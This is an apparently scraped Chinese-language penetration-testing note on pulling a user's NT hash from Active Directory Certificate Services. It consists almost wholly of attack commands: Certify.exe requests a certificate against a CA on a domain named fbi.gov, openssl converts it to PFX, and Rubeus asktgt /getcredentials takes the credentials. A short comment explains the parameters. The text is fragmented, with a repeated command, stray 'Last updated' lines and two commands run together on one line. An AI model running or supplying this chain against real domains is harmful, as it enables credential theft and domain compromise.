通过证书检索NTHash
Certify.exe request /ca:dc.fbi.gov\fbi-DC-CA /template:NTHash



1681730920678 

Last updated
Certify.exe request /ca:dc.fbi.gov\fbi-DC-CA /template:NTHash





Last updated
/usr/bin/openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx Rubeus.exe asktgt /getcredentials /user:"test2" /certificate:"cert.pfx" /password:"123456" /domain:"fbi.gov" /dc:"dc.fbi.gov" /show
# user是请求证书的用户,cert.pfx是刚刚在kali机器里转化得到的证书,密码是上面输入的密码